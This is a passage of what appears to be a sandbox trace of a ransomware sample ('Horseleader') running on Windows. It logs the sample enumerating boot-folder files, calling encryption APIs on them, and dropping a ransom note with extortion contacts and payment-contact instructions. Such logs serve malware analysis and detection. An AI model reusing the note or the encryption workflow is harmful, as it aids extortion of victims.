dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.707] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.708] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\#Decrypt#.txt") returned 31 [0121.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\#Decrypt#.txt" (normalized: "c:\\boot\\el-gr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.708] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.708] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.710] lstrlenA (lpString="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") returned 1368 [0121.710] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.710] CloseHandle (hObject=0x200) returned 1 [0121.711] GetProcessHeap () returned 0x780000 [0121.711] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.711] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="en-US", cAlternateFileName="")) returned 1 [0121.711] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0121.711] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0121.711] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0121.712] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0121.712] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-US", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.712] GetProcessHeap () returned 0x780000 [0121.712] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.712] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0121.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.713] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.713] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0121.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.713] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.713] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.713] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0121.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0121.714] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.714] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0121.714] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.714] lstrlenW (lpString=".testttjffg") returned 11 [0121.714] StrStrW (lpFirst="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.715] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.715] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0121.715] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0121.715] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0121.716] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.716] lstrcmpW (lpString1="memtest.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.716] lstrcmpW (lpString1="memtest.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.716] lstrlenW (lpString=".testttjffg") returned 11 [0121.716] StrStrW (lpFirst="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.717] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, 
ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0121.717] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.717] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\#Decrypt#.txt") returned 31 [0121.717] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\#Decrypt#.txt" (normalized: "c:\\boot\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.718] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.718] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.719] lstrlenA (lpString="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") returned 1368 [0121.719] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.719] CloseHandle (hObject=0x200) returned 1 [0121.719] GetProcessHeap () returned 0x780000 [0121.720] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.720] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="es-ES", cAlternateFileName="")) returned 1 [0121.720] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0121.720] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0121.720] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0121.720] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0121.720] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.720] GetProcessHeap () returned 0x780000 [0121.720] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.721] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0121.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.728] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0121.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.728] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.728] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0121.729] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.729] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.729] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.729] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.729] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0121.729] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.729] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.729] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.729] lstrlenW (lpString=".testttjffg") returned 11 [0121.729] StrStrW (lpFirst="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.730] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.730] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.730] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.730] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\#Decrypt#.txt") returned 31 [0121.730] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\#Decrypt#.txt" (normalized: "c:\\boot\\es-es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.731] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.731] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.732] lstrlenA (lpString="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") returned 1368 [0121.733] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.733] CloseHandle (hObject=0x200) returned 1 [0121.733] GetProcessHeap () returned 0x780000 [0121.733] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.733] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0121.733] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0121.734] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0121.734] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0121.734] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0121.734] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fi-FI", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.734] GetProcessHeap () returned 0x780000 [0121.734] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.734] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0121.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.735] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0121.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.735] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.735] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0121.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0121.736] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.736] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.736] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0121.736] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.736] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.736] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.736] lstrlenW (lpString=".testttjffg") returned 11 [0121.736] StrStrW (lpFirst="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.736] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.737] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.737] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, 
